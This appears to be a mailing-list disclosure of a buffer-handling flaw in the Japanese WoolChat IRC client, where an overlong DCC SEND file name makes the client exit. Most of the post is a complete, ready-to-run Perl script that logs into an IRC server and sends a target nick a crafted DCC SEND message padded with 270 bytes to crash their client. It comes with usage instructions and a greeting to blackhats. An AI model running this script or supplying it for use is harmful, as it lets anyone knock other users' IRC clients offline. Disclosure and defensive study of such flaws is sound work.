WoolChat IRC client is susceptible to a buffer overflow when a DCC send query is sent with more than 260 bytes.
a6d1f6823641006525e6c0878dfea4547cacc36a01aca5c25c1b55a0cb0a6157
Hi,
I found a bug about WoolChat (japanese popular irc client)
http://www.vector.co.jp/soft/win95/net/se091872.html
which allow anyone to kill victim's WoolChat. It has a problem
to handle DCC SEND query so if 260 (or more) bytes file
name is specified, it exits immediately with error dialog.
DoS script (in perl) here:
#!/usr/bin/perl
# ---- doswchat.pl
# DoS against WoolChat 0.1.4
# greetz to: Japanese all blackhats =)
# written by White_E
# http://nogimmick.org/
use Socket;
my $vict=$ARGV[0] || die "usage: $0 <nick>\n";
my ($host,$port)=('irc.tokyo.wide.ad.jp','6664'); # modify
my ($user,$nick)=('USER USER USER USER','bnzyrgwp'); # modify
my $recv;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));
select(S);$|=1;select(STDOUT);$|=1;
my $paddr=pack_sockaddr_in($port,inet_aton($host));
connect(S,$paddr) || die "ERR: connect()\n";
print "[*] connected to server.\n";
print S "USER $user\r\nNICK $nick\r\n";
print "[*] USER and NICK sent.\n";
foreach (0..40) {
$recv=<S>;
# print $recv;
last if ($recv =~ m/\s+376\s+/); # end of motd
}
my $file='A' x 270;
my $size='999';
my $msg="privmsg $vict :\x01DCC SEND $file 1234567890 2004 $size\x01\r\n";
print S $msg;
print "[*] attack done.\n";
print S "quit\r\n";
close(S);
exit;
Regards,
----
White_E <white_e@nogimmick.org>
http://nogimmick.org/